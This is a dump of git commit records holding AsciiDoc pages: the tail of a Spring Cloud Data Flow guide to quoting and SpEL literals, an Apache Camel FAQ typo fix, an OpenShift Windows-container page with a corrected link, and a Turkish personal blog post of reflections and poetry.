shell (for example, when calling the REST API directly).\nWhen entered inside the shell, chances are that the whole stream definition is itself inside double quotes, which would need to be escaped. The whole example then becomes the following:\n----\ndataflow:>stream create something --definition \"http | filter --expression=payload='something' | log\"\n\ndataflow:>stream create something --definition \"http | filter --expression='payload == ''something''' | log\"\n\ndataflow:>stream create something --definition \"http | filter --expression='payload == \\\"something\\\"' | log\"\n----\n\n\n\n==== SpEL Syntax and SpEL Literals\nThe last piece of the puzzle is about SpEL expressions.\nMany applications accept options that are to be interpreted as SpEL expressions, and, as seen above, String literals are handled in a special way there, too. The rules are as follows:\n\n* Literals can be enclosed in either single or double quotes.\n* Quotes need to be doubled to embed a literal quote. Single quotes inside double quotes need no special treatment, and the reverse is also true.\n\nAs a last example, assume you want to use the link:${scs-app-starters-docs}\/spring-cloud-stream-modules-processors.html#spring-clound-stream-modules-transform-processor[transform processor].\nThis processor accepts an `expression` option which is a SpEL expression. 
It is to be evaluated against the incoming message, with a default of `payload` (which forwards the message payload untouched).\n\nIt is important to understand that the following statements are equivalent:\n----\ntransform --expression=payload\ntransform --expression='payload'\n----\n\nHowever, they are different from the following (and variations upon them):\n----\ntransform --expression=\"'payload'\"\ntransform --expression='''payload'''\n----\n\nThe first series evaluates to the message payload, while the latter examples evaluate to the literal string, `payload`, (again, without quotes).\n\n==== Putting It All Together\nAs a last, complete example, consider how one could force the transformation of all messages to the string literal, `hello world`, by creating a stream in the context of the Data Flow shell:\n\/\/ asciidoctor note: callouts don't work here, they mess up the TOC for some reason\n----\ndataflow:>stream create something --definition \"http | transform --expression='''hello world''' | log\" <1>\n\ndataflow:>stream create something --definition \"http | transform --expression='\\\"hello world\\\"' | log\" <2>\n\ndataflow:>stream create something --definition \"http | transform --expression=\\\"'hello world'\\\" | log\" <2>\n----\n<1> In the first line, there are single quotes around the string (at the Data Flow parser level), but they need to be doubled because they are inside a string literal (started by the first single quote after the equals sign).\n<2> The second and third lines, use single and double quotes respectively to encompass the whole string at the Data Flow parser level. Consequently, the other kind of quote can be used inside the string. The whole thing is inside the `--definition` argument to the shell, though, which uses double quotes. 
Consequently, double quotes are escaped (at the shell level)\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ea150458d8445ec1d11c78dd4a9ab97855096ce","subject":"Update why-does-maven-not-download-dependencies.adoc","message":"Update why-does-maven-not-download-dependencies.adoc\n\nFix typo","repos":"adessaigne\/camel,apache\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,tdiesler\/camel,pmoerenhout\/camel,cunningt\/camel,gnodet\/camel,cunningt\/camel,pax95\/camel,pax95\/camel,christophd\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tadayosi\/camel,alvinkwekel\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,cunningt\/camel,tadayosi\/camel,nicolaferraro\/camel,pax95\/camel,apache\/camel,cunningt\/camel,nikhilvibhav\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,mcollovati\/camel,alvinkwekel\/camel,nicolaferraro\/camel,tdiesler\/camel,nikhilvibhav\/camel,adessaigne\/camel,gnodet\/camel,nicolaferraro\/camel,apache\/camel,gnodet\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,gnodet\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,mcollovati\/camel,apache\/camel,tadayosi\/camel,pmoerenhout\/camel,alvinkwekel\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,christophd\/camel,adessaigne\/camel,cunningt\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tadayosi\/camel,alvinkwekel\/camel,christophd\/camel,pax95\/camel,gnodet\/camel","old_file":"docs\/user-manual\/modules\/faq\/pages\/why-does-maven-not-download-dependencies.adoc","new_file":"docs\/user-manual\/modules\/faq\/pages\/why-does-maven-not-download-dependencies.adoc","new_contents":"[[Whydoesmavennotdownloaddependencies-Whydoesmavennotdownloaddependencies]]\n= Why does Maven not download dependencies?\n\nMaven uses HTTP to download its dependencies along with the dependencies\nof the Maven project (such as Camel).\n\nIf you run Maven and it fails to download your required dependencies it's\nlikely to be caused by your local firewall & HTTP proxy configurations.\n\nSee the http:\/\/maven.apache.org\/guides\/mini\/guide-proxies.html[Maven documentation for details of how to configure the HTTP proxy].\n","old_contents":"[[Whydoesmavennotdownloaddependencies-Whydoesmavennotdownloaddependencies]]\n= Why does Maven not download dependencies?\n\nMaven uses HTTP to download its dependenices along with the dependencies\nof the Maven project (such as Camel).\n\nIf you run Maven and it fails to download your required dependencies it's\nlikely to be caused by your local firewall & HTTP proxy configurations.\n\nSee the http:\/\/maven.apache.org\/guides\/mini\/guide-proxies.html[Maven documentation for details of how to configure the HTTP proxy].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c48e57b86d101a1c8780062df4f289bcecdf4cd","subject":"WMCO - Fixed an incorrect link in the WMCO documentation.","message":"WMCO - Fixed an incorrect link in the WMCO documentation.\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"windows_containers\/enabling-windows-container-workloads.adoc","new_file":"windows_containers\/enabling-windows-container-workloads.adoc","new_contents":"[id=\"enabling-windows-container-workloads\"]\n= Enabling Windows container workloads\ninclude::modules\/common-attributes.adoc[]\n:context: 
enabling-windows-container-workloads\n\ntoc::[]\n\nBefore adding Windows workloads to your cluster, you must install the Windows Machine Config Operator (WMCO), which is available in the {product-title} OperatorHub. The WMCO orchestrates the process of deploying and managing Windows workloads on a cluster.\n\n[discrete]\n== Prerequisites\n\n* You have access to an {product-title} cluster using an account with `cluster-admin` permissions.\n\n* You have installed the OpenShift CLI (`oc`).\n\n* You have installed your cluster using installer-provisioned infrastructure. Clusters installed with user-provisioned infrastructure are not supported for Windows container workloads.\n\n* You have configured hybrid networking with OVN-Kubernetes for your cluster. This must be completed during the installation of your cluster. For more information, see xref:..\/networking\/ovn_kubernetes_network_provider\/configuring-hybrid-networking.adoc#configuring-hybrid-ovnkubernetes[Configuring hybrid networking].\n\n* You are running an {product-title} cluster version 4.6.8 or later.\n\n.Additional resources\n* For the comprehensive prerequisites for the Windows Machine Config Operator, see xref:..\/windows_containers\/understanding-windows-container-workloads.adoc#wmco-prerequisites_understanding-windows-container-workloads[Understanding Windows container workloads].\n\n[id=\"installing-the-wmco\"]\n== Installing the Windows Machine Config Operator\n\nYou can install the Windows Machine Config Operator using either the web console or OpenShift CLI (`oc`).\n\ninclude::modules\/installing-wmco-using-web-console.adoc[leveloffset=+2]\n\ninclude::modules\/installing-wmco-using-cli.adoc[leveloffset=+2]\n\ninclude::modules\/configuring-secret-for-wmco.adoc[leveloffset=+1]\n\n\n== Additional resources\n\n* xref:..\/installing\/installing_azure\/installing-azure-default.adoc#ssh-agent-using_installing-azure-default[Generating a key pair for cluster node SSH access]\n* xref:..\/operators\/admin\/olm-adding-operators-to-cluster.adoc#olm-adding-operators-to-a-cluster[Adding Operators to a cluster].\n","old_contents":"[id=\"enabling-windows-container-workloads\"]\n= Enabling Windows container workloads\ninclude::modules\/common-attributes.adoc[]\n:context: enabling-windows-container-workloads\n\ntoc::[]\n\nBefore adding Windows workloads to your cluster, you must install the Windows Machine Config Operator (WMCO), which is available in the {product-title} OperatorHub. The WMCO orchestrates the process of deploying and managing Windows workloads on a cluster.\n\n[discrete]\n== Prerequisites\n\n* You have access to an {product-title} cluster using an account with `cluster-admin` permissions.\n\n* You have installed the OpenShift CLI (`oc`).\n\n* You have installed your cluster using installer-provisioned infrastructure. Clusters installed with user-provisioned infrastructure are not supported for Windows container workloads.\n\n* You have configured hybrid networking with OVN-Kubernetes for your cluster. This must be completed during the installation of your cluster. 
For more information, see xref:..\/networking\/ovn_kubernetes_network_provider\/configuring-hybrid-networking.adoc#configuring-hybrid-ovnkubernetes[Configuring hybrid networking].\n\n* You are running an {product-title} cluster version 4.6.8 or later.\n\n.Additional resources\n* For the comprehensive prerequisites for the Windows Machine Config Operator, see xref:understanding-windows-container-workloads.adoc#wmco-prerequisites_understanding-windows-container-workloads[Understanding Windows container workloads].\n\n[id=\"installing-the-wmco\"]\n== Installing the Windows Machine Config Operator\n\nYou can install the Windows Machine Config Operator using either the web console or OpenShift CLI (`oc`).\n\ninclude::modules\/installing-wmco-using-web-console.adoc[leveloffset=+2]\n\ninclude::modules\/installing-wmco-using-cli.adoc[leveloffset=+2]\n\ninclude::modules\/configuring-secret-for-wmco.adoc[leveloffset=+1]\n\n\n== Additional resources\n\n* xref:..\/installing\/installing_azure\/installing-azure-default.adoc#ssh-agent-using_installing-azure-default[Generating a key pair for cluster node SSH access]\n* xref:..\/operators\/admin\/olm-adding-operators-to-cluster.adoc#olm-adding-operators-to-a-cluster[Adding Operators to a cluster].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eac755e76d201d4d2e207e4b8f79327358d843db","subject":"Update 2017-10-02-Kisa-Kisa-2.adoc","message":"Update 2017-10-02-Kisa-Kisa-2.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_contents":"= K\u0131sa K\u0131sa (2)\n:hp-tags:\n\nBir s\u00fcredir haftada bir yapt\u0131\u011f\u0131m yolculuklarda fark\u0131na vard\u0131m ki her yolculuk bana \u00f6l\u00fcm\u00fc ciddi anlamda hat\u0131rlat\u0131yor. G\u00fcnl\u00fck ya\u015fant\u0131da mezarl\u0131k duvarlar\u0131n\u0131n arkas\u0131na silkeledi\u011fim(iz) bu ger\u00e7e\u011fi hat\u0131rlamama vesile oluyor yolculuklar. Her yolculuk bunu az veya \u00e7ok bir \u015fekilde y\u00e2d\u0131ma d\u00fc\u015f\u00fcr\u00fcyormu\u015f asl\u0131nda yeni farkettim. Neden sorusu bu sezi\u015fin pe\u015fine tak\u0131ld\u0131 hemencecik. \u0130lk akl\u0131ma gelen cevap \u015fu oldu: \"\u00d6l\u00fcm de bir yolculuktur neticede. Bu k\u0131sa yolculuklar o b\u00fcy\u00fck yolculu\u011fun bir musaggaras\u0131d\u0131r.\" Bir de \u015f\u00f6yle tartt\u0131m kendimi: \"Yoksa geri d\u00f6nememek korkusu mu bu ya\u015fad\u0131\u011f\u0131n?\", \"\u00d6l\u00fcm\u00fc de geri d\u00f6n\u00fc\u015f\u00fc olmayan bir gidi\u015f olarak g\u00f6r\u00fcyorsun da D\u00fcnya'ya d\u00fc\u015fk\u00fcnl\u00fc\u011f\u00fcn m\u00fc akl\u0131na getiriyor onu?\" Terazinin iki kefesine iki d\u00fc\u015f\u00fcnceyi de b\u0131rakt\u0131m, tahterevallide oynayan \u00e7ocuklar gibi hangileri a\u015fa\u011f\u0131da hangileri yukar\u0131da g\u00f6remedim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu yolculuklar\u0131n bitiminde kendimi bir arkada\u015f\u0131n kuca\u011f\u0131na b\u0131rak\u0131verdim. 
Birka\u00e7 ayd\u0131r uzak kald\u0131\u011f\u0131m, avlusunda kedilerin ko\u015fturmacas\u0131na dald\u0131\u011f\u0131m \u00dcsk\u00fcdar Mihrimah Sultan Cami\u00ee'nden ba\u015fka bir yer de\u011fildi. Her seferinde uzaktan g\u00fcl-endam\u0131n\u0131 seyredip biraz \u00f6zlem biraz sevin\u00e7le yol al\u0131yorum ona do\u011fru. Gece en siyah \u00e7ar\u015faf\u0131 \u00f6rterken g\u00f6ky\u00fcz\u00fcne avlusuna ayak bas\u0131yorum, Valide Sultan Cami\u00ee ile s\u00f6yle\u015fmeye ba\u015fl\u0131yor iki dost. B\u00f6lm\u00fcyorum onlar\u0131, dinliyorum bir yandan \u015fad\u0131rvandan akan sular\u0131n sesi. G\u00fcne\u015f utanga\u00e7l\u0131\u011f\u0131n\u0131 k\u0131z\u0131ll\u0131klar\u0131n ard\u0131nda b\u0131rakarak g\u00f6steriyor kendini. Bir ba\u015fka dostu g\u00f6r\u00fcyorum, uzak kalman\u0131n \u0131rak edemedi\u011fi bir dostu. Sonra diyorum: \"Dostu g\u00f6rmek, bayramd\u0131r.\"\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYolculuk, okul, i\u015f derken bir yo\u011funluk kapl\u0131yor d\u00f6rt yan\u0131m\u0131. Yapaca\u011f\u0131m i\u015flerin, g\u00f6revlerin vs. zihnimi me\u015fgul etmesi san\u0131r\u0131m daha yorucu oluyor. Bu yo\u011funluk i\u00e7erisinde bir yaz\u0131y\u0131 okumak i\u00e7in zaman kollamaya \u00e7al\u0131\u015f\u0131yordum, bir t\u00fcrl\u00fc nasip olmuyordu. Okudu\u011fum zaman normalde alamayaca\u011f\u0131m bir keyfi ald\u0131m. San\u0131r\u0131m okumak i\u00e7in g\u00f6sterdi\u011fim i\u015ftiyak kitapla\/yaz\u0131yla aramda bir ba\u011f olu\u015fmas\u0131na vesile oluyor. Ayn\u0131 durum ruhen, zihnen yo\u011fun oldu\u011fum veya kendimi yaln\u0131z hissetti\u011fim -y\u0131llard\u0131r tek ya\u015famama ra\u011fmen yaln\u0131z hissetti\u011fim zamanlar, kalabal\u0131klar i\u00e7indeki yaln\u0131zl\u0131\u011f\u0131mdan az- anlarda yine ortaya \u00e7\u0131k\u0131yor. Roman\u0131n bir kahraman\u0131 omzuma dokunuyor, bir di\u011feri elini uzat\u0131yor, \u00f6b\u00fcr\u00fc g\u00fcl\u00fcms\u00fcyor. Buna en iyi \u00f6rnek _Nisan'\u0131n 2 G\u00fcn\u00fc_, basit ve yal\u0131n bir anlat\u0131m\u0131 olsa da i\u00e7inde yer buldu\u011fum bir romand\u0131. Birka\u00e7 y\u0131l \u00f6nce okul k\u00fct\u00fcphanesinde denk gelip \u00f6d\u00fcn\u00e7 alm\u0131\u015ft\u0131m. Bir k\u0131\u015f g\u00fcn\u00fc s\u0131rt\u0131m\u0131 pete\u011fe dayay\u0131p okudu\u011fumu hat\u0131rl\u0131yorum. Petek siperin bir cephesi olmu\u015ftu, ayaklar\u0131m\u0131n siperin di\u011fer cephesine de\u011fdi\u011fini hissediyordum. Kabzas\u0131 ayaklar\u0131m\u0131n ucunda bir t\u00fcfek omzuma yaslanm\u0131\u015ft\u0131.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi insan tan\u0131yorum, ke\u015fke daha \u00f6nce tan\u0131sayd\u0131m diyorum. Ve ke\u015fkeye \u00f6yle bir duygu ve vurgu y\u00fckl\u00fcyorum ki takat getiremiyor, eziliyor. Bir mahr\u00fb -g\u00fczel tavr\u0131 ay gibi parl\u0131yor- bed\u00e2yi-\u00e2\u015fin\u00e2 (bed\u00e2yi-\u015finas) nas\u0131l olunur \u00f6\u011fretiyor. Ben ne kadar \u00f6\u011frenebilirim bilmiyorum. Bir daha *ke\u015fke*... 
\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCevdet Pa\u015fa'n\u0131n eli omzuma dokundu.\n\n_Nas\u0131l \u00e7\u0131ld\u0131rmad\u0131m hayretdeyim h\u00e2l\u00e2 sevincimden_ +\n_Lis\u00e2n\u0131ndan seni sevdim s\u00f6z\u00fcn g\u00fb\u015f itdi\u011fim demler_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6kte ay, parl\u0131yor; ay\u0131n on d\u00f6rd\u00fcd\u00fcr. \n\n_Sana vard\u0131r y\u00fcre\u011fimde s\u00f6zlerim_\n\nvideo::So6VlDiHukI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDede Efendi ne dersin b\u00f6yle?\n\nvideo::vvFUnXpoUSE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Anlat\u0131yorum, hi\u00e7 konu\u015fmadan,_ +\n_Bu\u011fday\u0131n i\u00e7ini d\u00f6kmesi gibi...\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir dua, Kays'\u0131n dilinden g\u00f6nl\u00fcme d\u00fc\u015fer: +\n_\"Gittik\u00e7e h\u00fcsn\u00fcn eyle ziy\u00e2de nig\u00e2r\u0131m\u0131n_ +\n_Geldik\u00e7e derdine beter et m\u00fcptel\u00e2 beni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_Neden kendi c\u00fcmlelerinle konu\u015fmazs\u0131n?_ +\n-Bu h\u00e2l, akl\u0131m\u0131 setr ederken ben nas\u0131l konu\u015fay\u0131m? +\n-_Peki niye kendine s\u00f6zc\u00fcler bulursun, onlar\u0131n diliyle s\u00f6ylersin?_ +\n-Dilim kendi g\u00f6nl\u00fcmden konu\u015fsa bu ate\u015f ya\u015f yaprak m\u0131 b\u0131rak\u0131r? +\n-_Peki niye susmazs\u0131n?_ +\n-\u0130\u00e7im ile durmadan s\u00f6yle\u015firken nas\u0131l susay\u0131m? +\n-_Haberdar oldu\u011funa delilin var m\u0131d\u0131r?_ +\n-Bir ay, ayd\u0131nl\u0131\u011f\u0131n\u0131n d\u00fc\u015ft\u00fc\u011f\u00fc g\u00f6n\u00fclden big\u00e2ne midir? +\n-_Ne vakte kadar inilersin?_ +\n-Vaktin varl\u0131\u011f\u0131ndan s\u0131yr\u0131lmadan tamam olunur mu? +\n-_Neyi beklersin?_ +\n-Pervane, \u015fem tutu\u015fmadan ne yaps\u0131n? 
Bekledi\u011fim \u015feminden bir \u0131\u015f\u0131kt\u0131r.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUyutmayan sebep, sen ne g\u00fczelsin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa Karacao\u011flan halim ortadad\u0131r, h\u00e2l\u00e2 uyand\u0131rmaz m\u0131? +\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. +\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. 
\u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. 
